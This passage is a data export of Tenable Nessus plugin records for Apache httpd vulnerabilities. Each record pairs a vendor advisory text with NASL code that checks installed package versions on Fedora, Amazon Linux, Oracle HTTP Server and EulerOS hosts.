"2023-07-01T16:36:39", "description": "This update includes the latest release of the Apache HTTP Server, version `2.4.41`, fixing various security issues. Several major enhancements are also included in this update :\n\n - `mod_md` is now packaged from upstream *github* releases, adding support for ACMEv2.\n\n - `mod_cgid` stderr handling has been improved\n\nSee http://www.apache.org/dist/httpd/CHANGES_2.4.41 for a full list of changes since the previous release of `httpd`.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-08-23T00:00:00", "type": "nessus", "title": "Fedora 30 : 1:mod_md / httpd (2019-099575a123)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098"], "modified": "2020-01-02T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:1:mod_md", "p-cpe:/a:fedoraproject:fedora:httpd", "cpe:/o:fedoraproject:fedora:30"], "id": "FEDORA_2019-099575A123.NASL", "href": "https://www.tenable.com/plugins/nessus/128084", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-099575a123.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(128084);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2020/01/02\");\n\n script_cve_id(\"CVE-2019-10092\", \"CVE-2019-10097\", \"CVE-2019-10098\");\n script_xref(name:\"FEDORA\", value:\"2019-099575a123\");\n\n script_name(english:\"Fedora 30 : 1:mod_md / httpd (2019-099575a123)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update includes the latest release of the Apache HTTP Server,\nversion `2.4.41`, fixing various security issues. Several major\nenhancements are also included in this update :\n\n - `mod_md` is now packaged from upstream *github*\n releases, adding support for ACMEv2.\n\n - `mod_cgid` stderr handling has been improved\n\nSee http://www.apache.org/dist/httpd/CHANGES_2.4.41 for a full list of\nchanges since the previous release of `httpd`.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.apache.org/dist/httpd/CHANGES_2.4.41\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-099575a123\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected 1:mod_md and / or httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:1:mod_md\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:30\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/09/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^30([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 30\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC30\", reference:\"mod_md-2.0.8-2.fc30\", epoch:\"1\")) flag++;\nif (rpm_check(release:\"FC30\", reference:\"httpd-2.4.41-1.fc30\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"1:mod_md / httpd\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-01T16:44:59", "description": "A cross-site scripting vulnerability was found in Apache httpd, affecting the mod_proxy error page. Under certain circumstances, a crafted link could inject content into the HTML displayed in the error page, potentially leading to client-side exploitation.(CVE-2019-10092)\n\nA vulnerability was discovered in Apache httpd, in mod_remoteip. A trusted proxy using the 'PROXY' protocol could send specially crafted headers that can cause httpd to experience a stack buffer overflow or NULL pointer dereference, leading to a crash or other potential consequences.\\n\\nThis issue could only be exploited by configured trusted intermediate proxy servers. HTTP clients such as browsers could not exploit the vulnerability.(CVE-2019-10097)\n\nA vulnerability was discovered in Apache httpd, in mod_rewrite.\nCertain self-referential mod_rewrite rules could be fooled by encoded newlines, causing them to redirect to an unexpected location. An attacker could abuse this flaw in a phishing attack or as part of a client-side attack on browsers.(CVE-2019-10098)", "cvss3": {}, "published": "2019-10-31T00:00:00", "type": "nessus", "title": "Amazon Linux 2 : httpd (ALAS-2019-1341)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098"], "modified": "2019-12-17T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:httpd", "p-cpe:/a:amazon:linux:httpd-debuginfo", "p-cpe:/a:amazon:linux:httpd-devel", "p-cpe:/a:amazon:linux:httpd-filesystem", "p-cpe:/a:amazon:linux:httpd-manual", "p-cpe:/a:amazon:linux:httpd-tools", "p-cpe:/a:amazon:linux:mod_ldap", "p-cpe:/a:amazon:linux:mod_md", "p-cpe:/a:amazon:linux:mod_proxy_html", "p-cpe:/a:amazon:linux:mod_session", "p-cpe:/a:amazon:linux:mod_ssl", "cpe:/o:amazon:linux:2"], "id": "AL2_ALAS-2019-1341.NASL", "href": "https://www.tenable.com/plugins/nessus/130400", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALAS-2019-1341.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(130400);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/12/17\");\n\n script_cve_id(\"CVE-2019-10092\", \"CVE-2019-10097\", \"CVE-2019-10098\");\n script_xref(name:\"ALAS\", value:\"2019-1341\");\n\n script_name(english:\"Amazon Linux 2 : httpd (ALAS-2019-1341)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux 2 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A cross-site scripting vulnerability was found in Apache httpd,\naffecting the mod_proxy error page. Under certain circumstances, a\ncrafted link could inject content into the HTML displayed in the error\npage, potentially leading to client-side exploitation.(CVE-2019-10092)\n\nA vulnerability was discovered in Apache httpd, in mod_remoteip. A\ntrusted proxy using the 'PROXY' protocol could send specially crafted\nheaders that can cause httpd to experience a stack buffer overflow or\nNULL pointer dereference, leading to a crash or other potential\nconsequences.\\n\\nThis issue could only be exploited by configured\ntrusted intermediate proxy servers. HTTP clients such as browsers\ncould not exploit the vulnerability.(CVE-2019-10097)\n\nA vulnerability was discovered in Apache httpd, in mod_rewrite.\nCertain self-referential mod_rewrite rules could be fooled by encoded\nnewlines, causing them to redirect to an unexpected location. An\nattacker could abuse this flaw in a phishing attack or as part of a\nclient-side attack on browsers.(CVE-2019-10098)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/AL2/ALAS-2019-1341.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update httpd' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_md\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/09/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"AL2\", reference:\"httpd-2.4.41-1.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"httpd-debuginfo-2.4.41-1.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"httpd-devel-2.4.41-1.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"httpd-filesystem-2.4.41-1.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"httpd-manual-2.4.41-1.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"httpd-tools-2.4.41-1.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"mod_ldap-2.4.41-1.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"mod_md-2.4.41-1.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"mod_proxy_html-2.4.41-1.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"mod_session-2.4.41-1.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"mod_ssl-2.4.41-1.amzn2.0.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-filesystem / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:24:32", "description": "The version of Oracle HTTP Server installed on the remote host is affected by the following vulnerabilities as referenced in the October 2020 CPU advisory:\n\n - A denial of service (DoS) vulnerability exists in the SSL Module (OpenSSL). An unauthenticated, remote attacker with network access via HTTPS, can exploit this issue to cause a hang or frequently repeatable crash (complete DoS) of Oracle HTTP Server. (CVE-2020-1967)\n\n - An unspecified vulnerability exists in the Apache HTTP Server Core component. A authenticated, remote attacker with network access via HTTP, can exploit this issue to compromise the Oracle HTTP Server. Successful attacks of this vulnerability can result in takeover of Oracle HTTP Server. (CVE-2019-10097)\n\n - An unspecified vulnerability exists in Web Listener (cURL). An unauthenticated, remote attacker with network access via TFTP can exploit this issue to compromise Oracle HTTP Server. Successful attacks of this vulnerability can result in takeover of Oracle HTTP Server. (CVE-2019-5482) Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-11-02T00:00:00", "type": "nessus", "title": "Oracle Fusion Middleware Oracle HTTP Server (Oct 2020 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10097", "CVE-2019-5482", "CVE-2020-1967"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:http_server"], "id": "ORACLE_HTTP_SERVER_CPU_OCT_2020.NASL", "href": "https://www.tenable.com/plugins/nessus/142212", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142212);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-5482\", \"CVE-2019-10097\", \"CVE-2020-1967\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Oracle Fusion Middleware Oracle HTTP Server (Oct 2020 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle HTTP Server installed on the remote host is affected by the following vulnerabilities as\nreferenced in the October 2020 CPU advisory:\n\n - A denial of service (DoS) vulnerability exists in the SSL Module (OpenSSL). An unauthenticated, remote\n attacker with network access via HTTPS, can exploit this issue to cause a hang or frequently repeatable \n crash (complete DoS) of Oracle HTTP Server. (CVE-2020-1967)\n\n - An unspecified vulnerability exists in the Apache HTTP Server Core component. A authenticated, remote\n attacker with network access via HTTP, can exploit this issue to compromise the Oracle HTTP Server. \n Successful attacks of this vulnerability can result in takeover of Oracle HTTP Server. (CVE-2019-10097)\n\n - An unspecified vulnerability exists in Web Listener (cURL). An unauthenticated, remote attacker with\n network access via TFTP can exploit this issue to compromise Oracle HTTP Server. Successful attacks of\n this vulnerability can result in takeover of Oracle HTTP Server. (CVE-2019-5482)\n \nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpuoct2020.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the October 2020 Oracle Critical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-5482\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:http_server\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_http_server_installed.nbin\");\n script_require_keys(\"Oracle/OHS/Installed\");\n\n exit(0);\n}\n\ninclude('oracle_http_server_patch_func.inc');\n\nget_kb_item_or_exit('Oracle/OHS/Installed');\ninstall_list = get_kb_list_or_exit('Oracle/OHS/*/EffectiveVersion');\n\ninstall = branch(install_list, key:TRUE, value:TRUE);\n\npatches = make_array();\npatches['12.2.1.3'] = make_array('fix_ver', '12.2.1.3.200911', 'patch', '31876370');\npatches['12.2.1.4'] = make_array('fix_ver', '12.2.1.4.200826', 'patch', '31808404');\n\noracle_http_server_check_vuln(install : install, min_patches : patches, severity : SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:56:04", "description": "According to the versions of the httpd packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - In Apache HTTP Server 2.4.32-2.4.39, when mod_remoteip was configured to use a trusted intermediary proxy server using the 'PROXY' protocol, a specially crafted PROXY header could trigger a stack buffer overflow or NULL pointer deference. This vulnerability could only be triggered by a trusted proxy and not by untrusted HTTP clients.(CVE-2019-10097)\n\n - Some HTTP/2 implementations are vulnerable to unconstrained interal data buffering, potentially leading to a denial of service. The attacker opens the HTTP/2 window so the peer can send without constraint however, they leave the TCP window closed so the peer cannot actually write (many of) the bytes on the wire.\n The attacker then sends a stream of requests for a large response object. Depending on how the servers queue the responses, this can consume excess memory, CPU, or both.(CVE-2019-9517)\n\n - HTTP/2 (2.4.20 through 2.4.39) very early pushes, for example configured with 'H2PushResource', could lead to an overwrite of memory in the pushing request's pool, leading to crashes. The memory copied is that of the configured push link header values, not data supplied by the client.(CVE-2019-10081)\n\n - In Apache HTTP Server 2.4.18-2.4.39, using fuzzed network input, the http/2 session handling could be made to read memory after being freed, during connection shutdown.(CVE-2019-10082)\n\n - In Apache HTTP Server 2.4 release 2.4.37 and prior, mod_session checks the session expiry time before decoding the session. This causes session expiry time to be ignored for mod_session_cookie sessions since the expiry time is loaded when the session is decoded.(CVE-2018-17199)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-02-25T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP8 : httpd (EulerOS-SA-2020-1155)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17199", "CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10097", "CVE-2019-9517"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:httpd", "p-cpe:/a:huawei:euleros:httpd-devel", "p-cpe:/a:huawei:euleros:httpd-filesystem", "p-cpe:/a:huawei:euleros:httpd-manual", "p-cpe:/a:huawei:euleros:httpd-tools", "p-cpe:/a:huawei:euleros:mod_session", "p-cpe:/a:huawei:euleros:mod_ssl", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2020-1155.NASL", "href": "https://www.tenable.com/plugins/nessus/133989", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(133989);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\n \"CVE-2018-17199\",\n \"CVE-2019-10081\",\n \"CVE-2019-10082\",\n \"CVE-2019-10097\",\n \"CVE-2019-9517\"\n );\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"EulerOS 2.0 SP8 : httpd (EulerOS-SA-2020-1155)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the httpd packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - In Apache HTTP Server 2.4.32-2.4.39, when mod_remoteip\n was configured to use a trusted intermediary proxy\n server using the 'PROXY' protocol, a specially crafted\n PROXY header could trigger a stack buffer overflow or\n NULL pointer deference. This vulnerability could only\n be triggered by a trusted proxy and not by untrusted\n HTTP clients.(CVE-2019-10097)\n\n - Some HTTP/2 implementations are vulnerable to\n unconstrained interal data buffering, potentially\n leading to a denial of service. The attacker opens the\n HTTP/2 window so the peer can send without constraint\n however, they leave the TCP window closed so the peer\n cannot actually write (many of) the bytes on the wire.\n The attacker then sends a stream of requests for a\n large response object. Depending on how the servers\n queue the responses, this can consume excess memory,\n CPU, or both.(CVE-2019-9517)\n\n - HTTP/2 (2.4.20 through 2.4.39) very early pushes, for\n example configured with 'H2PushResource', could lead to\n an overwrite of memory in the pushing request's pool,\n leading to crashes. The memory copied is that of the\n configured push link header values, not data supplied\n by the client.(CVE-2019-10081)\n\n - In Apache HTTP Server 2.4.18-2.4.39, using fuzzed\n network input, the http/2 session handling could be\n made to read memory after being freed, during\n connection shutdown.(CVE-2019-10082)\n\n - In Apache HTTP Server 2.4 release 2.4.37 and prior,\n mod_session checks the session expiry time before\n decoding the session. This causes session expiry time\n to be ignored for mod_session_cookie sessions since the\n expiry time is loaded when the session is\n decoded.(CVE-2018-17199)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1155\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2159315e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected httpd packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10082\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/02/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:mod_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(8)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP8\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP8\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"httpd-2.4.34-8.h11.eulerosv2r8\",\n \"httpd-devel-2.4.34-8.h11.eulerosv2r8\",\n \"httpd-filesystem-2.4.34-8.h11.eulerosv2r8\",\n \"httpd-manual-2.4.34-8.h11.eulerosv2r8\",\n \"httpd-tools-2.4.34-8.h11.eulerosv2r8\",\n \"mod_session-2.4.34-8.h11.eulerosv2r8\",\n \"mod_ssl-2.4.34-8.h11.eulerosv2r8\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"8\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:58:44", "description": "According to the versions of the httpd packages installed, the EulerOS Virtualization for ARM 64 installation on the remote host is affected by the following vulnerabilities :\n\n - In Apache HTTP Server 2.4 release 2.4.37 and prior, mod_session checks the session expiry time before decoding the session. This causes session expiry time to be ignored for mod_session_cookie sessions since the 